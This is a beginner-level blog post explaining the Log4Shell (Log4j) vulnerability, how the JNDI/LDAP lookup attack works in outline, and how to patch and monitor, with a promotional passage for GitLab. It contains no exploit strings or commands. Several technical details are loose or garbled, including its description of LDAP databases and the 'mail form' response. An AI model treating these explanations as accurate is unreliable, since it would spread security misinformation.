Log4j Vulnerability - A Basic Guide

Log4j is not a codename for a super virus. Log4j is simply the name of a piece of open-source code, written in the Java library coding language. By some, the Log4j vulnerability (CVE-2021-44228) has been characterized as “the single biggest, most critical vulnerability of the last decade”.

Personally, I can understand all the drama behind this because Log4j is something very different compared to “ordinary” cybersecurity vulnerabilities. The key difference is that Log4j is a component that is part of different types of software of organizations instead of a single software program that contains a vulnerability. So it is not the software that is vulnerable but the component itself. This means that all pieces of different software that contain this component (and there is a lot of software out there containing this component) are vulnerable. Software is easy to track but a component, built within different types of software is something completely different.

In this post I will explain the basics about Log4j and why (in my opinion) the “buzz” that has been created in the cybersecurity community around Log4j is completely justified. To be completely clear, the actual vulnerability is called Log4Shell. Log4Shell is a software vulnerability in Apache Log4j 2, a popular Java library for logging messages in applications. I will stick to Log4j for general descriptions about how Log4j works and I will use Log4Shell when I talk about the actual vulnerability.

What is Log4j?

To fully understand why Log4j is an extremely serious cybersecurity threat, you need to understand how the development of modern software works and especially the programming language Java.

Let’s take building an e-commerce application as an example. To build this application, you choose Java as the programming language for this application. Because there is already a lot of pre-written code available, you don’t want to completely start from scratch with coding from the payment gateway to the user interface, to shopping cart, etc. These functionalities can be easily integrated into the code that you create. You do this by using components that other Java experts have already written (the pre-written code) and you would just integrate these components in your application for all the different functionalities you want to use: you don’t have to reinvent the wheel when it already exists. These small pieces of pre-written script code are called “.jar” files and Log4j is such a .jar file.

Log4j is a piece of pre-written Java code that gives an application a specific kind of logging functionality. For a programmer, this is very helpful. The basic purpose of Log4j is to log events of interest. This type of logging is a good debugging technique. A programmer, for example, can log all exceptions to find out quickly what is wrong with a specific type of code. This is a great help in the debugging process (removing programming issues) in case the code gives errors/doesn’t work. Analyzing the log file helps the programmer to identify even the most elusive bugs.

The Log4j module comes from Apache Software Foundation. This is an entity that manages open-source software. Apache Tomcat is the most widely used web server software that is out there which is managed by the Apache Software Foundation. You can find it on millions of servers all over the world.

A good example of Log4j at work is when you type or click on a bad weblink and get a 404 error message. The web server running the domain of the web link you tried to get to, tells you that there’s no such webpage. It also records that event in a log for the server’s system administrators using Log4j.

A similar diagnostic message is also used throughout software applications. In the online game Minecraft, Log4j is used by the server to log the activity of, for instance, total memory used and user commands typed into the console. Now imagine someone entering a code string in the Minecraft chat to immediately gain access to the Minecraft servers. That is exactly what happened! After applying patches this was not possible any longer but it shows the seriousness of Log4Shell: the vulnerability that surfaced these past weeks because of the Log4j coding.

Where exactly is the vulnerability?

The Log4Shell vulnerability is not on the client-side but on the server-side. A client is a machine or a program that requests services through the web while a server is a machine or a program that provides services to the clients according to the client’s requests.

To fully grasp this I will use the World Wide Web as an example. The World Wide Web (WWW) allows computers and other devices to communicate with each other. The devices in the network require obtaining various services including data and resources. The WWW works according to the client-server model. The devices or programs that require services are called the clients, and the devices that provide services to the clients are called servers.

If you go to amazon.com with your favorite browser (for instance with Chrome) to do some shopping, you use a browser to fetch your shopping information. The browser on your machine is the client. If you go to Amazon and start shopping, you retrieve information that is projected on your screen. This information is retrieved from the server on which all information is stored. Shortly summarized: attacks by hackers using the Log4Shell vulnerability are not aimed at the user (you behind your workstation) but aimed at the server on which all the information that you retrieve is stored. So the server is the patient in this story. And boy: this patient is seriously ill in case it has the Log4Shell vulnerability.

Maybe you sigh in relief now but don’t relax just yet. If a hacker runs an arbitrary code on an affected server, there are lots of additional options that can also hurt you as a client/user.

How do hackers use the vulnerability?

Remember the client-server model? Popular websites receive a lot of clients all day long.

Different types of information are logged for those clients at different times, depending on what information they need. Sometimes the date is registered but other times it can, for instance, be time, username, profile, etc. This information is all stored in different databases. For instance, the “date” database, the “time” database, the “username” database, the “profile” database, etc. In order to manage all this traffic of data in an orderly way, an “LDAP Server” is used. LDAP stands for Lightweight Directory Access Protocol. LDAP is a cross-platform vendor-neutral software protocol that is used for directory service authentication. You can see an LDAP server as a very detailed virtual phone book. The phone book gives you access to an extensive directory of contact information for hundreds of people. Using LDAP makes it very easy for you to search through the phone book and to find whatever information is needed.

Now the JNDI comes into play. JN stands for Java Naming and DI stands for Directory Interface. JNDI provides a standard Application Programming Interface (API) for interacting with naming and directory services using a service provider interface (SPI). JNDI gives Java applications and objects a powerful and transparent interface to access directory services like LDAP.

As we saw, Log4j runs on the application to log all events that run on this application that is connected with the LDAP server that runs the JNDI plugin. Log4j also uses a JNDI plugin and because of this, the Log4Shell vulnerability is possible. This brings us to the next question: How is this vulnerability exploited?

This is done in case a hacker uses a special string of characters that is put in the log of a specific application that has the Log4Shell vulnerability. The strings that are required for this are not complicated and are easy to obtain for everyone. It only requires a few minutes of Googling and any person will have a string of code that is required to exploit the vulnerability. This means that this vulnerability is extremely easy to exploit: also for people who hardly know anything about hacking. After the string has been entered, JNDI will pick up the data and move it to the server of the hacker. When this is done, the hacker server sends a mail form or non-standard response to Log4j. After that, it will move to the application. When that happens, it’s “party-time” for the hacker because there is now free access for the hacker to the vulnerable server: a “backdoor” has been created. Below is a graphical figure that shows the full process that the hacker will follow. The Swiss CERT (GovCERT.ch) published this in a very good blog (a bit technical though) about Log4j. You can read more about the details over here.

The log4j JNDI Attack schematically explained

The biggest kind of damage a hacker can do is RCE. RCE stands for remote code execution. RCE gives an attacker the ability to access someone else’s computing device and make adjustments no matter where the device is located. In other words, a hacker can subvert the server, so it inflicts malware on visitors to websites that are hosted on that server. So indirectly it can compromise the workstation of you as a user as well by inflicting malware on your own system. Still, the chance is very small that a single individual will be attacked. The expectation is that mainly big companies will be hit because this is far more profitable.

On top of RCE, many other exploits are possible like Ransomware and deploying Crypto-Miners.

How to protect yourself and your organization?

Organizations that use Log4j 2 in their own applications and infrastructure should update them immediately. The same applies to third-party applications. The version 2.17.0 release fully secures the library against the Log4Shell vulnerability.

Because Log4Shell affects so many systems and is so easy to exploit, an organization must act swiftly to protect all its systems. To quickly identify affected systems, organizations need a solution like GitLab that can immediately and automatically identify vulnerable systems and their dependencies, and help an organization to prioritize the most critical systems to update first, especially on code running in production.

As Log4Shell continues to threaten companies’ applications and sensitive data, GitLab enables organizations to gain real-time insight into which assets the vulnerability affects at run-time, and which of these assets are the highest priority, while also monitoring the whole multi-cloud environment. This helps you maintain real-time awareness of malicious activity as you address the impact of the Log4Shell vulnerability.

In addition to that organizations should keep monitoring their systems to scan for suspicious traffic. Most hackers don’t strike immediately but only after a while when organizations start to lower their guard. It might be that they have set up a backdoor by using the vulnerability before a patch was executed by the organization.

As a private user, you can protect yourself against the earlier explained secondary attacks by installing a powerful antivirus utility and by keeping it updated. Stay alert for phishing frauds, use a password manager, and run your internet traffic through a Virtual Private Network (VPN).

Final thoughts

I think we will hear much more about organizations that are attacked because of the Log4Shell vulnerability in the next few years because of the following reasons:

It is very easy to use the Log4Shell vulnerability: as we saw, you don’t need to be a top hacker with an expensive set of gear to use the vulnerability and it can be used at any time;
Because of the scale (millions of servers are affected), it is expected that many vulnerable servers are overlooked and that after some time system admins more or less forget about the vulnerability which means attacks can happen for many years to come. In addition to that, it is very unrealistic to assume that all the millions of affected servers that are out there will be patched and properly monitored. On top of that many organizations won’t even realize that they have systems at risk;
A lot of backdoors might have been created by hackers in the past. The fact that the Log4Shell vulnerability was officially reported on November 24th by Chen Zhoujun from Alibaba’s Cloud Security Team, doesn’t mean that this vulnerability was not known by at least some hackers within the hacking community. That this vulnerability only now went “viral” is no indication that servers were not exposed by hackers in the past by using the Log4Shell vulnerability.
Over time, new information and with that new vulnerabilities can occur: most of the time the rabbit hole is far deeper than you think so this problem is not going to be completely solved for a long time. Be prepared to hear more incidents in relation to the Log4Shell vulnerability in the coming years.

My experience on this subject is pretty basic so feel free to give me additional advice/insights by contacting me. If you want to keep in the loop when I upload a new post, don’t forget to subscribe to receive a notification by e-mail.

M	T	W	T	F	S	S
					1	2
3	4	5	6	7	8	9
10	11	12	13	14	15	16
17	18	19	20	21	22	23
24	25	26	27	28	29	30